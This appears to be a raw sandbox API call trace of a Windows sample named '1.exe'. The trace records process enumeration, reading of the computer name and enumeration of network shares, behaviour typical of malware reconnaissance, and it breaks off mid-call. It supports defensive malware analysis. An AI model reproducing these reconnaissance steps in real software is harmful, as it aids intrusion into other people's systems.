[0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.404] GetLastError () returned 0x0 [0134.404] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.405] SetLastError (dwErrCode=0x0) [0134.405] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.406] GetLastError () returned 0x0 [0134.406] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.407] SetLastError (dwErrCode=0x0) [0134.407] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.408] SetLastError (dwErrCode=0x0) [0134.408] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.409] SetLastError (dwErrCode=0x0) [0134.409] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.410] SetLastError (dwErrCode=0x0) [0134.410] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.411] SetLastError (dwErrCode=0x0) [0134.411] GetLastError () returned 0x0 [0134.412] SetLastError (dwErrCode=0x0) [0134.412] GetLastError () returned 0x0 [0134.412] SetLastError (dwErrCode=0x0) [0134.412] GetLastError () returned 0x0 [0134.412] SetLastError (dwErrCode=0x0) [0134.412] GetLastError () returned 0x0 [0134.412] SetLastError (dwErrCode=0x0) [0134.412] GetLastError () returned 0x0 [0134.412] SetLastError (dwErrCode=0x0) [0134.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a0 [0134.420] Process32FirstW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.421] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.421] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.422] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.423] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.423] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.424] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.424] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.425] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.426] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0134.426] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0134.427] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.427] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.428] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.429] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.429] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.430] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.430] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.431] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.432] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.432] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.433] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.433] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.434] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.435] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.435] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.436] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.513] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0134.513] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.514] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0134.515] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0134.515] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0134.516] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0134.516] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.517] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0134.518] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0134.518] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0134.519] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0134.519] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0134.520] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0134.521] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0134.521] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0134.522] Process32NextW (in: hSnapshot=0x3a0, lppe=0x2e2fb64 | out: lppe=0x2e2fb64*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 0 [0134.523] CloseHandle (hObject=0x3a0) returned 1 [0134.523] Sleep (dwMilliseconds=0x1f4) [0135.281] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb57b8 | out: hHeap=0x2cb0000) returned 1 [0135.281] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb5370 | out: hHeap=0x2cb0000) returned 1 [0135.281] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4660 | out: hHeap=0x2cb0000) returned 1 Thread: id = 74 os_tid = 0xf10 [0134.436] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x21a) returned 0x2cb5bf8 [0134.436] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb4940 [0134.437] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x494 [0134.437] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x490 [0134.437] GetComputerNameW (in: lpBuffer=0x2cb5c08, nSize=0x326fadc | out: lpBuffer="NQDPDE", nSize=0x326fadc) returned 1 [0134.437] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13c0 [0134.437] GetLastError () returned 0xcb [0134.437] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x214) returned 0x2cb5e20 [0134.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0134.437] GetCurrentThreadId () returned 0xf10 [0134.437] SetLastError (dwErrCode=0xcb) [0134.437] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.438] SetLastError (dwErrCode=0xcb) [0134.438] GetLastError () returned 0xcb [0134.439] SetLastError (dwErrCode=0xcb) [0134.439] GetLastError () returned 0xcb [0134.439] SetLastError (dwErrCode=0xcb) [0134.439] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4000) returned 0x2cb6040 [0134.439] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4340048 [0134.440] WNetOpenEnumW (in: dwScope=0x1, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x326fa9c | out: lphEnum=0x326fa9c*=0x1363ef0) returned 0x0 [0134.694] WNetEnumResourceW (in: hEnum=0x1363ef0, lpcCount=0x326fa94, lpBuffer=0x2cb6040, lpBufferSize=0x326faa0 | out: lpcCount=0x326fa94, lpBuffer=0x2cb6040, lpBufferSize=0x326faa0) returned 0x103 [0134.695] WNetCloseEnum (hEnum=0x1363ef0) returned 0x0 [0134.695] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb6040 | out: hHeap=0x2cb0000) returned 1 [0134.695] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4340048 | out: hHeap=0x2cb0000) returned 1 [0134.696] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x4000) returned 0x2cb6040 [0134.696] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4340048 [0134.696] WNetOpenEnumW (in: dwScope=0x4, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x326fa84 | out: lphEnum=0x326fa84*=0x1363210) returned 0x0 [0134.697] WNetEnumResourceW (in: hEnum=0x1363210, lpcCount=0x326fa7c, lpBuffer=0x2cb6040, lpBufferSize=0x326fa88 | out: lpcCount=0x326fa7c, lpBuffer=0x2cb6040, lpBufferSize=0x326fa88) returned 0x103 [0134.697] WNetCloseEnum (hEnum=0x1363210) returned 0x0 [0134.697] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb6040 | out: hHeap=0x2cb0000) returned 1 [0134.697] HeapFree (in: 